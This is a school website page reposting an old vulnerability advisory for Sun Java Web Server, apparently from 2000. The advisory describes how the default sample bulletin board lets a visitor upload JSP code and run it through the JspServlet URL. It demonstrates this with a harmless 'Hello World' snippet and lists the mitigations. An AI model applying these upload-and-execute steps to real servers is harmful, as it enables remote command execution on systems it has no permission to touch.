美国硅谷SVSE中南校区

美国硅谷软件教育中南校区

·设为首页  ·加入收藏  ·行车路线  ·网站导航
对不起,您的电脑屏蔽了活动内容的显示或没有安装FlashPlayer插件;
 
 
 
 
 
 
 
 
 
非常DIY,想学由自己——美国硅谷svse千人精品课程团购月 1月15日脱产班火爆抢座中 金融危机下哪些行业饭碗更牢靠? 软件工程师不可不知的10个概念
学习园地 About
技术文章  
交流天地  
学员风采  
学员心声  
学员作品  
在线咨询 Online
姜老师
点击这里给我发消息
孙老师
点击这里给我发消息
张老师
点击这里给我发消息
若老师不在,请您在"在线咨询"栏目里面留言,谢谢!
服务热线 Hot Line
咨询服务热线
电话:027-87269766
电话:027-87269866
人才推荐及就业服务热线
电话:027-51871147
教学质量部服务热线
电话:027-87265336
交流天地 About
当前位置:美国硅谷SVSE中南校区首页->交流天地

Sun Java Web服务器远程可执行命令漏洞

2008-6-8 14:15:57

   


Sun Java Web
服务器远程可执行命令漏洞

---(文/飞天蜘蛛)
漏洞发布时间:2000-7-13 17:41:00
漏 洞 描 述:

Solaris and Windows NTSun Java Web Server默认安装设置下。通过公告版的样板程序的漏洞,可以远程执行任意命令。

漏洞测试方法如下:

下面的例子将显示如何上载和执行该代码,而在服务器上显示"Hello World"

输入下面的JSP代码将打印出"Hello World":

<% String s="Hello World"; %>
<%=s %>

通过下面的公告版连接Post这段代码:

http://jws.site/examples/applications/bboard/bboard_frames.html

检验是否该代码真正的上载了:

http://jws.site/board.html

通过执行下面的连接编译和执行该代码:

http://jws.site/servlet/com.sun.server.http.pagecompile.jsp.runtime.JspServlet/board.html

解 决 方 法:

仔细按照Java Web Server手册中的"How to secure a web site that uses the Java Web Server" 一章进行设置,或者参考下面连接:
http://www.sun.com/software/jwebserver/faq/jwsca-2000-02.html
或者简单的移除默认安装的这些样板文件。

 

本文地址: (转载请注明出处)
【打印】  【关闭】
        

Copyright @ 2008 Silicon Valley Software Engineer Training Course Co.,Ltd 版权所有美国硅谷SVSE软件工程教育中南校区(版权所有) 地址:武昌中南路中商广场36楼
咨询电话:027-87269866  传真:027-87269766 鄂ICP备08003015号-1